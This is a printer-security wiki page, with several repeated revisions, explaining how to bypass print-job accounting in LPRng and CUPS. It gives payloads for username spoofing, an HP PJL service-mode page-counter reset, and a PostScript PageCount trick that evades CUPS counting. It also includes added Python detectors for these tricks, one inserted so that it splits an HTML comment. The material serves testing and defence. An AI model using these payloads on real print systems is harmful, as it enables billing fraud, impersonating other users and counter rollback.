Accounting bypass (Hacking Printers wiki, http://hacking-printers.net/wiki/index.php/Main_Page, revision of 2017-06-25 by Admin)

Printing without permission can itself be a security risk or a breach of company policy. In environments where print jobs are charged for, an inside attacker has a motivation to bypass the accounting system. Typical examples range from copy shops to schools and universities where print quotas are enforced. Many companies also keep track of printer usage per employee or per department. Besides free copies, breaking accounting and authentication systems can be used to discredit an employee, for example by printing pornographic images under his name. Furthermore, being able to ‘print’ is a precondition for most attacks against network printers – therefore any restrictions need to be bypassed first.

== Introduction to print job accounting ==

There are two major approaches to print job accounting: either let the printer handle it directly or use a print server in between. The first approach is vendor-specific, usually involves some kind of special ‘printer driver’ and is not discussed further here. The other approach involves a separate print server – usually a software implementation like [https://en.wikipedia.org/wiki/CUPS CUPS] or [https://en.wikipedia.org/wiki/LPRng LPRng] – which handles the accounting; it is quite common in companies and institutions. The print server may speak LPD, IPP or other printing protocols and forwards jobs to the actual printer. '''It is important to note that direct network access to the printer must be restricted''', otherwise an attacker can easily bypass the print server and its accounting mechanisms.
This not only means filtering access to the ports typically assigned to printing protocols, but also to less well-known printing channels like [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or the embedded web server, which can often be abused to print as described in [[Fundamentals#Network_printing_protocols|network printing protocols]].

There are basically two approaches to circumvent or trick print job accounting systems: either impersonate another user or manipulate the counter of printed pages. In the following, both options are discussed for LPRng (v3.8.B) and CUPS (v2.1.4) installations, which are popular open-source printing systems used in academic and corporate environments. A comparison of the security features of both systems is given below.

{| class="wikitable" style="text-align:center"
|+ Security features of LPRng and CUPS
|-
! Printing system !! Protocol !! Encryption !! Authentication !! Page counter
|-
| LPRng || [[LPD]] || SSL/TLS || Kerberos, PGP || hardware
|-
| CUPS || [[IPP]] || SSL/TLS || Kerberos, HTTP || software
|}

== Authentication bypasses ==

LPRng and CUPS both offer SSL-based channel encryption and secure authentication schemes like [https://en.wikipedia.org/wiki/Kerberos_(protocol) Kerberos], [https://en.wikipedia.org/wiki/Pretty_Good_Privacy PGP]-signed print jobs or HTTP [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication. If these are configured properly and the attacker cannot access the printer directly, she will not be able to impersonate other users. Those security features, however, are optional and rarely applied on real-world print servers. Instead, the usernames given as LPD (LPRng) or IPP (CUPS) parameters are logged and accounted for – and these can be set to arbitrary values by the client side.
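Because the accounting log records exactly the username the client supplied, a defender can at least look for the symptoms of spoofing in it. The following Python script is an added example written for this page, not code from the Hacking Printers project or from CUPS. It assumes the default CUPS <code>page_log</code> format (<code>printer user job-id [date-time] page-number num-copies job-billing job-originating-host-name job-name media sides</code>), a directory of valid accounts and a mapping of workstation hostnames to their assigned users; the log lines, account names and hostnames are all constructed sample data.

```python
"""Flag CUPS page_log entries that point to spoofed usernames.

Added example for this wiki page; it is not code from the Hacking Printers
project or from CUPS. Assumptions: the default CUPS page_log format
(printer user job-id [date-time] page-number num-copies job-billing
job-originating-host-name job-name media sides), a directory of valid accounts
and a mapping of workstation hostnames to their assigned users. All sample
data below is constructed.
"""
import re
from collections import defaultdict

# First eight fields of a default-format page_log line; the job name that
# follows may contain spaces, so it is not captured here.
PAGE_LOG_RE = re.compile(
    r"^(?P<printer>\S+) (?P<user>\S+) (?P<job>\d+) \[(?P<time>[^\]]+)\] "
    r"(?P<page>\d+|total) (?P<copies>\d+) (?P<billing>\S+) (?P<host>\S+)"
)

# Constructed sample log: job 103 uses a username that exists in no directory
# (the page's "lp -U nobody" test) and job 104 claims to be alice but was
# submitted from mallory's workstation.
SAMPLE_PAGE_LOG = """\
lj4250 alice 101 [25/Jun/2017:10:02:11 +0200] total 3 - ws-alice.corp.example Report.pdf na_letter_8.5x11in one-sided
lj4250 bob 102 [25/Jun/2017:10:05:40 +0200] total 12 - ws-bob.corp.example slides.pdf iso_a4_210x297mm two-sided-long-edge
lj4250 nobody 103 [25/Jun/2017:10:07:02 +0200] total 40 - ws-mallory.corp.example test.ps iso_a4_210x297mm one-sided
lj4250 alice 104 [25/Jun/2017:10:09:55 +0200] total 200 - ws-mallory.corp.example test.ps iso_a4_210x297mm one-sided
"""

# Constructed directory data (hypothetical accounts and workstation assignments).
KNOWN_ACCOUNTS = {"alice", "bob", "mallory"}
HOST_OWNER = {
    "ws-alice.corp.example": "alice",
    "ws-bob.corp.example": "bob",
    "ws-mallory.corp.example": "mallory",
}


def parse_page_log(text):
    """Return one dict per parseable page_log line; other lines are skipped."""
    entries = []
    for line in text.splitlines():
        match = PAGE_LOG_RE.match(line)
        if match:
            entries.append(match.groupdict())
    return entries


def find_suspicious_jobs(entries, known_accounts, host_owner):
    """Return (job-id, user, reason) tuples for entries worth a second look.

    Three symptoms of a client-chosen username are checked: the account does
    not exist, the job came from a workstation assigned to someone else, or
    one account printed from several hosts within the same log window.
    """
    findings = []
    hosts_per_user = defaultdict(set)
    for entry in entries:
        user, host, job = entry["user"], entry["host"], entry["job"]
        hosts_per_user[user].add(host)
        if user not in known_accounts:
            findings.append((job, user, "unknown account"))
        elif host in host_owner and host_owner[host] != user:
            findings.append((job, user, "submitted from host owned by %s" % host_owner[host]))
    for user, hosts in sorted(hosts_per_user.items()):
        if len(hosts) > 1:
            findings.append(("-", user, "printed from %d different hosts" % len(hosts)))
    return findings


if __name__ == "__main__":
    for job, user, reason in find_suspicious_jobs(
        parse_page_log(SAMPLE_PAGE_LOG), KNOWN_ACCOUNTS, HOST_OWNER
    ):
        print("job %s user %s: %s" % (job, user, reason))
```

On the constructed log the script flags job 103 (unknown account <code>nobody</code>), job 104 (<code>alice</code> printing from <code>mallory</code>'s workstation) and the fact that <code>alice</code> appears from two hosts. Such a check only detects the symptom after the pages have been charged to the wrong account; preventing impersonation requires enabling one of the authentication schemes mentioned above, which most sites do not do.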
The reason for this is a simple cost-benefit consideration in most institutions: Kerberos needs a special setup on every client, and HTTP authentication requires users to enter a password whenever they want to print something, while the costs of a few unaccounted printouts are bearable.

'''How to test for this attack?''' If your system is already configured to use the print server to be tested, you can verify whether authentication is enforced by trying to print with a custom username like this:

<syntaxhighlight lang=sh>
lp -U nobody test.ps
</syntaxhighlight>

'''Who can perform this attack?''' Anyone who can access the print server (as said, if the printer can be accessed directly you have already lost anyway).

== Page counter manipulation ==

=== Hardware page counters ===

For correct accounting, the number of printed pages must be determined by the printing system, which is not a trivial task as discussed in <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011</ref>. The authors of LPRng ‘make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles’ <ref>''[http://web.mit.edu/ops/services/print/Attic/src/doc/LPRng-HOWTO-15.html Printer Accounting Reality Check]'', LPRng-HOWTO, P. Powell, 1995</ref>. Such hardware page counters are supported by most printers and '''read''' by LPRng using PJL after every print job. HP has even documented a feature to '''write''' to the page counter variable <ref>''[https://h30434.www3.hp.com/psg/attachments/psg/PostPrint/141685/1/PJL%20commands-Druckerz%C3%A4hler%20setzen%20HP2015dn.pdf HP LaserJet Family Quick Reference Service Guide]'', HP Inc., 1999, p. 53</ref> by setting the printer into service mode.
This way, the page counter of the ''HP LaserJet 1200'', ''HP LaserJet 4200N'' and ''HP LaserJet 4250N'' can be manipulated within a print job. At the end of the document to be printed, and separated by the [[UEL]], the counter simply has to be reset to its original value (for example, <code>2342</code>):

<pre>
\x1b%-12345X@PJL JOB
This page was printed for free
\x1b%-12345X@PJL EOJ
\x1b%-12345X@PJL JOB
@PJL SET SERVICEMODE=HPBOISEID
@PJL SET PAGES=2342
\x1b%-12345X@PJL EOJ
</pre>

Depending on the logic of the accounting software, an attacker might even increase the balance of her account – which may be linked with other services like the canteen – by setting a negative number of printed pages. Note that resetting the device to [[Factory defaults]] also resets the page counter to zero on some of the tested devices; however, this method is not suitable if a specific value is desired. Lowering the page counter can also be used to sell a printer above its price, comparable to tampering with the odometer when selling a second-hand car. It is, however, worth emphasizing that resetting the page counter is not necessarily for malicious purposes: it is a well-known business model to sell overpriced ink for low-cost inkjet devices and to block third-party refill kits by refusing to print after a certain number of pages – to handle such unethical practices it is absolutely legitimate to reset the page counter.

'''How to test for this attack?''' On older HP LaserJets the ''pagecount'' command of [[PRET]] can be used to easily set hardware page counters:

<pre>
./pret.py -q printer pjl
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> pagecount 10
Old pagecounter: 53214
New pagecounter: 10
</pre>

'''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].
=== Software page counters ===

CUPS uses software page counters, which have been implemented for all major page description languages. For PostScript, an easy way to bypass accounting is to check whether the ''PageCount'' system parameter exists – which evaluates to ''false'' when interpreted in CUPS/Ghostscript – before actually printing the document, as shown below.

<syntaxhighlight lang=postscript>
currentsystemparams (PageCount) known {
  % [...] code which is only executed on a printer device [...]
} if
</syntaxhighlight>

This way, the accounting software used by CUPS renders a different document than the printer does. CUPS only accounts for one page – which seems to be a hardcoded minimum – while the real print job can contain hundreds of pages. Note that using the IPP ‘raw’ queue/option is mandatory; otherwise CUPS parses the code with a PostScript-to-PostScript filter (Ghostscript's ps2write) before it reaches the page counter.

'''How to test for this attack?''' Wrap an arbitrary multi-page PostScript document in the code above and print it. Then go to <code>http://printserver:631/jobs?which_jobs=all</code> and check CUPS's page count for this print job. Note that you have to use a raw queue, that is, a queue where the filtering system is not involved and the print job goes directly to the printer. For CUPS, this is done by setting the content type to <code>application/vnd.cups-raw</code>. If your system is already configured to use the print server to be tested, simply use <code>lp -o raw test.ps</code>.

'''Who can perform this attack?''' Anyone who can forward jobs to the (CUPS-based) print server. However, it deserves to be mentioned that only a local attacker has an actual benefit from free hard copies.

<!-- % number of copies vs.
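Both page counter attacks above leave a recognisable trace in the job data itself: the hardware variant needs <code>@PJL SET SERVICEMODE</code> and <code>@PJL SET PAGES</code>, which print drivers never emit, and the software variant needs PostScript that branches on the <code>PageCount</code> system parameter. The following Python script is an added example for this page, not code from the Hacking Printers project, CUPS or LPRng. It is meant to run on the spooler, on the raw bytes of a job, because a raw queue skips the filter chain that would otherwise normalise the PostScript. The three sample jobs are constructed for the example; the first reproduces the PJL sequence shown in the hardware page counter section.

```python
"""Inspect a print job for page-accounting tampering before it reaches the printer.

Added example for this wiki page; it is not code from the Hacking Printers
project, CUPS or LPRng. It reports the two patterns described in the hardware
and software page counter sections: PJL commands that enter service mode or
write the page counter, and PostScript that branches on the PageCount system
parameter so that Ghostscript and the printer render different documents.
All sample jobs are constructed.
"""
import re

UEL = b"\x1b%-12345X"  # Universal Exit Language sequence that separates PJL jobs

# PJL keywords are case-insensitive; only the two accounting-relevant
# variables are matched, so ordinary @PJL SET COPIES/RESOLUTION are left alone.
PJL_COUNTER_WRITE_RE = re.compile(
    rb"@PJL\s+SET\s+(SERVICEMODE|PAGES)\s*=\s*(\S+)", re.IGNORECASE
)

# PostScript is case-sensitive; the key may be written as a string or a name.
PS_PAGECOUNT_BRANCH_RE = re.compile(
    rb"currentsystemparams\s*(?:\(PageCount\)|/PageCount)\s+known"
)


def split_pjl_jobs(data):
    """Split a job stream into its UEL-delimited segments (empty segments dropped)."""
    return [segment for segment in data.split(UEL) if segment.strip()]


def inspect_job(data):
    """Return a list of (kind, what, value) findings for one raw job."""
    findings = []
    for match in PJL_COUNTER_WRITE_RE.finditer(data):
        findings.append(("pjl", match.group(1).decode().upper(), match.group(2).decode()))
    if PS_PAGECOUNT_BRANCH_RE.search(data):
        findings.append(("postscript", "PageCount-conditional", ""))
    return findings


def job_is_suspicious(data):
    """True when the job should be held for review instead of being forwarded."""
    return bool(inspect_job(data))


# Constructed: the PJL sequence shown on this page, a printed line followed
# by a second PJL job that rewrites the hardware page counter.
TAMPERED_PJL_JOB = (
    UEL + b"@PJL JOB\r\n"
    + b"This page was printed for free\r\n"
    + UEL + b"@PJL EOJ\r\n"
    + UEL + b"@PJL JOB\r\n"
    + b"@PJL SET SERVICEMODE=HPBOISEID\r\n"
    + b"@PJL SET PAGES=2342\r\n"
    + UEL + b"@PJL EOJ\r\n"
)

# Constructed: an ordinary two-page PostScript document.
CLEAN_PS_JOB = b"""%!PS-Adobe-3.0
%%Pages: 2
/Helvetica findfont 12 scalefont setfont
72 720 moveto (page one) show showpage
72 720 moveto (page two) show showpage
%%EOF
"""

# Constructed: PostScript whose pages only exist when PageCount is defined,
# i.e. on a real printer but not in the CUPS/Ghostscript accounting pass.
CONDITIONAL_PS_JOB = b"""%!PS-Adobe-3.0
currentsystemparams (PageCount) known {
  /Helvetica findfont 12 scalefont setfont
  72 720 moveto (hidden page) show showpage
} if
%%EOF
"""


if __name__ == "__main__":
    for name, job in (("tampered PJL", TAMPERED_PJL_JOB),
                      ("clean PostScript", CLEAN_PS_JOB),
                      ("conditional PostScript", CONDITIONAL_PS_JOB)):
        print(name, "->", inspect_job(job) or "no findings")
```

The check is a tripwire, not a guarantee: PostScript can build the <code>PageCount</code> lookup from concatenated strings, and a job that reaches the printer directly is never seen by the spooler at all, which is why the page insists on restricting direct network access. A second, pattern-independent signal for the hardware variant is available to any accounting system that already reads the counter via PJL after each job: a counter that is lower after a job than before it can only mean the value was rewritten.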
density % http://unix.stackexchange.com/questions/101395/cups-and-printer-security/194532 % http://www.pykota.com/ | http://www.pykota.com/software/pkpgcounter for cups % http://stackoverflow.com/questions/15628319/how-cups-printer-accounting-works % http://www.cups.org/doc/accounting.html % http://www.lprng.com/LPRng-HOWTO-Multipart/accountingref.html % http://www.brunel.ac.uk/~tony/LPRng/LPRng-HOWTO-11.html % http://lists.pykota.com/pipermail/pykota/2006-October/004177.html --> ---- 5c24c6bf5d2deaeea656080e5d791fb718db0454 199 198 2017-01-23T13:08:17Z Admin 1 wikitext text/x-wiki Printing without permission can itself be a security risk or breach of company policy. In environments where print jobs are charged for an inside attacker has a motivation to bypass the accounting system. Typical examples range from copy shops to schools and universities where print quotas are to be enforced. Also, many companies keep track of the printer usage by each employee or by department. Besides free copies, breaking accounting and authentication systems can be used to discredit an employee for example by printing pornographic images under his name. Furthermore, being able to ‘print’ is a precondition for most attacks against network printers – therefore any restrictions need to be bypassed first. == Introduction to print job accounting == There are two major approaches when it comes to print job accounting: Either let the printer handle it directly or use a print server in between. The first approach is vendor-specific, usually involves some kind of special ‘printer driver’ and is not further discussed here. The other approach involves a separate print server – usually a software implementation like [https://en.wikipedia.org/wiki/CUPS CUPS] or [https://en.wikipedia.org/wiki/LPRng LPRng] – to handle the accounting and is quite common in companies and institutions. The print server may speak LPD, IPP or further printing protocols and forwards jobs to the actual printer. 
'''It is important to note that direct network access to the printer must be restricted''', otherwise an attacker can easily bypass the print server and its accounting mechanisms. This not only means filtering access to the ports typically assigned to printing protocols, but also to less known printing channels like [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or the embedded web server which can often be abused to print as described in [[Network protocols]]. There are basically two approaches to circumvent or trick print job accounting systems: either impersonate another user or manipulate the counter of printed pages. In the following both options are discussed for LPRng (v3.8.B) and CUPS (v2.1.4) installations which are popular open-source printing systems used in academic and corporate environments. A comparison of the security features of both systems is given below. {| class="wikitable" style="text-align:center" |+ Security features of LPRng and CUPS |- ! Printing system !! Protocol !! Encryption !! Authentication !! Page counter |- | LPRng || [[LPD]] || SSL/TLS || Kerberos, PGP || hardware |- | CUPS || [[IPP]] || SSL/TLS || Kerberos, HTTP || software |} == Authentication bypasses == LPRng and CUPS both offer SSL based channel encryption and secure authentication schemes like [https://en.wikipedia.org/wiki/Kerberos_(protocol) Kerberos], [https://en.wikipedia.org/wiki/Pretty_Good_Privacy PGP] signed print jobs or HTTP [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication. If configured properly and in case the attacker cannot access the printer directly she will be not be able to impersonate other users. Those security features however are optional and rarely applied in the real-world print servers. Instead, the usernames given as LPD (LPRng) or IPP (CUPS) parameters are logged and accounted for – which can be set to arbitrary values by the client side. 
The reasons for this is a simple cost-benefit consideration in most institutions: Kerberos needs a special setup on every client and HTTP authentication requires users to enter a password whenever they want to print something while the costs of a few unaccounted printouts are bearable. '''How to test for this attack?''' If your system is already configured to use the print server to be tested, you can verify proper authentication trying to print with a custom username like this: <syntaxhighlight lang=sh> lp -U nobody test.ps </syntaxhighlight> '''Who can perform this attack?''' Anyone who can access the print server (as said, if the printer can be accessed directly you have already lost anyway). == Page counter manipulation == === Hardware page counters === For correct accounting the number of printed pages must be determined by the printing system which is not a trivial task as discussed in <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011</ref>. The authors of LPRng ‘make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles’ <ref>''[http://web.mit.edu/ops/services/print/Attic/src/doc/LPRng-HOWTO-15.html Printer Accounting Reality Check]'', LPRng-HOWTO, P. Powell, 1995</ref>. Such hardware page counters are supported by most printers and '''read''' by LPRng using PJL after every print job. HP has even documented a feature to '''write''' to the page counter variable <ref>''[https://h30434.www3.hp.com/psg/attachments/psg/PostPrint/141685/1/PJL%20commands-Druckerz%C3%A4hler%20setzen%20HP2015dn.pdf HP LaserJet Family Quick Reference Service Guide]'', HP Inc., 1999, p. 53</ref> by setting the printer into service mode. 
This way, the page counter of the ''HP LaserJet 1200'', ''HP LaserJet 4200N'' and the ''HP LaserJet 4250N'' can be manipulated within a print job. At the end of the document to be printed and separated by the [[UEL]], the counter simply has to be reset to its original value (for example, <code>2342</code>): \x1b%-12345X@PJL JOB This page was printed for free \x1b%-12345X@PJL EOJ \x1b%-12345X@PJL JOB @PJL SET SERVICEMODE=HPBOISEID @PJL SET PAGES=2342 \x1b%-12345X@PJL EOJ Based on the logic of the accounting software an attacker might even increase the balance of her account – which may be linked with other services like the canteen – by setting a negative number of printed pages. Note that resetting the device to [[Factory defaults]] also resets the page counter to zero on some of the tested devices, however this method is not suited if a certain value is desired. Lowering the page counter can also be used to sell a printer above its price as it can be compared to the odometer when buying a second-hand car. It is however worth emphasizing that resetting the page counter is not necessarily for malicious purposes: It is a well-known business model to sell overpriced ink for low-cost inkjet devices and block third-party refill kits by refusing to print after a certain number of pages – to handle such unethical practices it is absolutely legitimate to reset the page counter. '''How to test for this attack?''' On older HP laserjets the ''pagecount'' command of [[PRET]] can be used to easily set hardware pagecounters: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> pagecount 10 Old pagecounter: 53214 New pagecounter: 10 '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. 
=== Software page counters === CUPS uses software page counters which have been implemented for all major page description languages. For PostScript, an easy way to bypass accounting is to check if the ''PageCount'' system parameter exists – which will return ''false'' when interpreted in CUPS/Ghostscript – before actually printing the document as shown below. <syntaxhighlight lang=postscript> currentsystemparams (PageCount) known { <@\textit{[...] code which is only executed on a printer device [...]}@> } if </syntaxhighlight> This way, the accounting software used by CUPS renders a different document than the printer. CUPS only accounts for one page – which seems to be a hardcoded minimum – while the real print job can contain hundreds of pages. Note that using the IPP ‘raw’ queue/option is mandatory, otherwise CUPS parses the code with a PostScript-to-PostScript filter (Ghostscript's ps2write) before it reaches the page counter. '''How to test for this attack?''' Wrap an arbitrary multi-page PostScript document in the code above and print. Then go to <code>http://printserver:631/jobs?which_jobs=all</code> and check CUPS's page counter for this print job. Note that have to establish a raw raw queue. This is, a queue where the filtering system is not involved and the print job goes directly to a printer. For CUPS, this is done done by setting the content type to <code>application/vnd.cups-raw</code>. If your system is already configured to use the print server to be tested, simply use: <code>lp -o raw test.ps</code>. '''Who can perform this attack?''' Anyone who forward jobs to the (CUPS based) print server. However it deserves to be mentioned that only a local attacker has an actual benefit of free hard copies. <!-- % number of copies vs. 
density % http://unix.stackexchange.com/questions/101395/cups-and-printer-security/194532 % http://www.pykota.com/ | http://www.pykota.com/software/pkpgcounter for cups % http://stackoverflow.com/questions/15628319/how-cups-printer-accounting-works % http://www.cups.org/doc/accounting.html % http://www.lprng.com/LPRng-HOWTO-Multipart/accountingref.html % http://www.brunel.ac.uk/~tony/LPRng/LPRng-HOWTO-11.html % http://lists.pykota.com/pipermail/pykota/2006-October/004177.html --> ---- e22346b534dbf9b08ab4a4dd47f531c2d11e2454 198 179 2017-01-23T13:08:04Z Admin 1 wikitext text/x-wiki Printing without permission can itself be a security risk or breach of company policy. In environments where print jobs are charged for an inside attacker has a motivation to bypass the accounting system. Typical examples range from copy shops to schools and universities where print quotas are to be enforced. Also, many companies keep track of the printer usage by each employee or by department. Besides free copies, breaking accounting and authentication systems can be used to discredit an employee for example by printing pornographic images under his name. Furthermore, being able to ‘print’ is a precondition for most attacks against network printers – therefore any restrictions need to be bypassed first. == Introduction to print job accounting == There are two major approaches when it comes to print job accounting: Either let the printer handle it directly or use a print server in between. The first approach is vendor-specific, usually involves some kind of special ‘printer driver’ and is not further discussed here. The other approach involves a separate print server – usually a software implementation like [https://en.wikipedia.org/wiki/CUPS CUPS] or [https://en.wikipedia.org/wiki/LPRng LPRng] – to handle the accounting and is quite common in companies and institutions. The print server may speak LPD, IPP or further printing protocols and forwards jobs to the actual printer. 
'''It is important to note that direct network access to the printer must be restricted''', otherwise an attacker can easily bypass the print server and its accounting mechanisms. This not only means filtering access to the ports typically assigned to printing protocols, but also to less known printing channels like [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or the embedded web server which can often be abused to print as described in [[Network protocols]]. There are basically two approaches to circumvent or trick print job accounting systems: either impersonate another user or manipulate the counter of printed pages. In the following both options are discussed for LPRng (v3.8.B) and CUPS (v2.1.4) installations which are popular open-source printing systems used in academic and corporate environments. A comparison of the security features of both systems is given below. {| class="wikitable" style="text-align:center" |+ Security features of LPRng and CUPS |- ! Printing system !! Protocol !! Encryption !! Authentication !! Page counter |- | LPRng || [[LPD]] || SSL/TLS || Kerberos, PGP || hardware |- | CUPS || [[IPP]] || SSL/TLS || Kerberos, HTTP || software |} == Authentication bypasses == LPRng and CUPS both offer SSL based channel encryption and secure authentication schemes like [https://en.wikipedia.org/wiki/Kerberos_(protocol) Kerberos], [https://en.wikipedia.org/wiki/Pretty_Good_Privacy PGP] signed print jobs or HTTP [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication. If configured properly and in case the attacker cannot access the printer directly she will be not be able to impersonate other users. Those security features however are optional and rarely applied in the real-world print servers. Instead, the usernames given as LPD (LPRng) or IPP (CUPS) parameters are logged and accounted for – which can be set to arbitrary values by the client side. 
The reasons for this is a simple cost-benefit consideration in most institutions: Kerberos needs a special setup on every client and HTTP authentication requires users to enter a password whenever they want to print something while the costs of a few unaccounted printouts are bearable. '''How to test for this attack?''' If your system is already configured to use the print server to be tested, you can verify proper authentication trying to print with a custom username like this: <syntaxhighlight lang=sh> lp -U nobody test.ps </syntaxhighlight> '''Who can perform this attack?''' Anyone who can access the print server (as said, if the printer can be accessed directly you have already lost anyway). == Page counter manipulation == === Hardware page counters === For correct accounting the number of printed pages must be determined by the printing system which is not a trivial task as discussed in <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011</ref>. The authors of LPRng ‘make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles’ <ref>''[http://web.mit.edu/ops/services/print/Attic/src/doc/LPRng-HOWTO-15.html Printer Accounting Reality Check]'', LPRng-HOWTO, P. Powell, 1995</ref>. Such hardware page counters are supported by most printers and '''read''' by LPRng using PJL after every print job. HP has even documented a feature to '''write''' to the page counter variable <ref>''[https://h30434.www3.hp.com/psg/attachments/psg/PostPrint/141685/1/PJL%20commands-Druckerz%C3%A4hler%20setzen%20HP2015dn.pdf HP LaserJet Family Quick Reference Service Guide]'', HP Inc., 1999, p. 53</ref> by setting the printer into service mode. 
This way, the page counter of the ''HP LaserJet 1200'', ''HP LaserJet 4200N'' and the ''HP LaserJet 4250N'' can be manipulated within a print job. At the end of the document to be printed and separated by the [[UEL]], the counter simply has to be reset to its original value (for example, <code>2342</code>): \x1b%-12345X@PJL JOB This page was printed for free \x1b%-12345X@PJL EOJ \x1b%-12345X@PJL JOB @PJL SET SERVICEMODE=HPBOISEID @PJL SET PAGES=2342 \x1b%-12345X@PJL EOJ Based on the logic of the accounting software an attacker might even increase the balance of her account – which may be linked with other services like the canteen – by setting a negative number of printed pages. Note that resetting the device to [[Factory defaults]] also resets the page counter to zero on some of the tested devices, however this method is not suited if a certain value is desired. Lowering the page counter can also be used to sell a printer above its price as it can be compared to the odometer when buying a second-hand car. It is however worth emphasizing that resetting the page counter is not necessarily for malicious purposes: It is a well-known business model to sell overpriced ink for low-cost inkjet devices and block third-party refill kits by refusing to print after a certain number of pages – to handle such unethical practices it is absolutely legitimate to reset the page counter. '''How to test for this attack?''' On older HP laserjets the ''pagecounter'' command of [[PRET]] can be used to easily set hardware pagecounters: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> pagecount 10 Old pagecounter: 53214 New pagecounter: 10 '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. 
=== Software page counters === CUPS uses software page counters which have been implemented for all major page description languages. For PostScript, an easy way to bypass accounting is to check if the ''PageCount'' system parameter exists – which will return ''false'' when interpreted in CUPS/Ghostscript – before actually printing the document as shown below. <syntaxhighlight lang=postscript> currentsystemparams (PageCount) known { <@\textit{[...] code which is only executed on a printer device [...]}@> } if </syntaxhighlight> This way, the accounting software used by CUPS renders a different document than the printer. CUPS only accounts for one page – which seems to be a hardcoded minimum – while the real print job can contain hundreds of pages. Note that using the IPP ‘raw’ queue/option is mandatory, otherwise CUPS parses the code with a PostScript-to-PostScript filter (Ghostscript's ps2write) before it reaches the page counter. '''How to test for this attack?''' Wrap an arbitrary multi-page PostScript document in the code above and print. Then go to <code>http://printserver:631/jobs?which_jobs=all</code> and check CUPS's page counter for this print job. Note that have to establish a raw raw queue. This is, a queue where the filtering system is not involved and the print job goes directly to a printer. For CUPS, this is done done by setting the content type to <code>application/vnd.cups-raw</code>. If your system is already configured to use the print server to be tested, simply use: <code>lp -o raw test.ps</code>. '''Who can perform this attack?''' Anyone who forward jobs to the (CUPS based) print server. However it deserves to be mentioned that only a local attacker has an actual benefit of free hard copies. <!-- % number of copies vs. 
density % http://unix.stackexchange.com/questions/101395/cups-and-printer-security/194532 % http://www.pykota.com/ | http://www.pykota.com/software/pkpgcounter for cups % http://stackoverflow.com/questions/15628319/how-cups-printer-accounting-works % http://www.cups.org/doc/accounting.html % http://www.lprng.com/LPRng-HOWTO-Multipart/accountingref.html % http://www.brunel.ac.uk/~tony/LPRng/LPRng-HOWTO-11.html % http://lists.pykota.com/pipermail/pykota/2006-October/004177.html --> ---- 4444fbf424fbd8ff50e628225ec4e59337ee7623 179 136 2017-01-21T11:47:42Z Admin 1 wikitext text/x-wiki Printing without permission can itself be a security risk or breach of company policy. In environments where print jobs are charged for an inside attacker has a motivation to bypass the accounting system. Typical examples range from copy shops to schools and universities where print quotas are to be enforced. Also, many companies keep track of the printer usage by each employee or by department. Besides free copies, breaking accounting and authentication systems can be used to discredit an employee for example by printing pornographic images under his name. Furthermore, being able to ‘print’ is a precondition for most attacks against network printers – therefore any restrictions need to be bypassed first. == Introduction to print job accounting == There are two major approaches when it comes to print job accounting: Either let the printer handle it directly or use a print server in between. The first approach is vendor-specific, usually involves some kind of special ‘printer driver’ and is not further discussed here. The other approach involves a separate print server – usually a software implementation like [https://en.wikipedia.org/wiki/CUPS CUPS] or [https://en.wikipedia.org/wiki/LPRng LPRng] – to handle the accounting and is quite common in companies and institutions. The print server may speak LPD, IPP or further printing protocols and forwards jobs to the actual printer. 
'''It is important to note that direct network access to the printer must be restricted''', otherwise an attacker can easily bypass the print server and its accounting mechanisms. This not only means filtering access to the ports typically assigned to printing protocols, but also to less known printing channels like [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or the embedded web server which can often be abused to print as described in [[Network protocols]]. There are basically two approaches to circumvent or trick print job accounting systems: either impersonate another user or manipulate the counter of printed pages. In the following both options are discussed for LPRng (v3.8.B) and CUPS (v2.1.4) installations which are popular open-source printing systems used in academic and corporate environments. A comparison of the security features of both systems is given below. {| class="wikitable" style="text-align:center" |+ Security features of LPRng and CUPS |- ! Printing system !! Protocol !! Encryption !! Authentication !! Page counter |- | LPRng || [[LPD]] || SSL/TLS || Kerberos, PGP || hardware |- | CUPS || [[IPP]] || SSL/TLS || Kerberos, HTTP || software |} == Authentication bypasses == LPRng and CUPS both offer SSL based channel encryption and secure authentication schemes like [https://en.wikipedia.org/wiki/Kerberos_(protocol) Kerberos], [https://en.wikipedia.org/wiki/Pretty_Good_Privacy PGP] signed print jobs or HTTP [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication. If configured properly and in case the attacker cannot access the printer directly she will be not be able to impersonate other users. Those security features however are optional and rarely applied in the real-world print servers. Instead, the usernames given as LPD (LPRng) or IPP (CUPS) parameters are logged and accounted for – which can be set to arbitrary values by the client side. 
The reason such features are rarely enabled is a simple cost-benefit consideration in most institutions: Kerberos needs a special setup on every client and HTTP authentication requires users to enter a password whenever they want to print something, while the cost of a few unaccounted printouts is bearable.

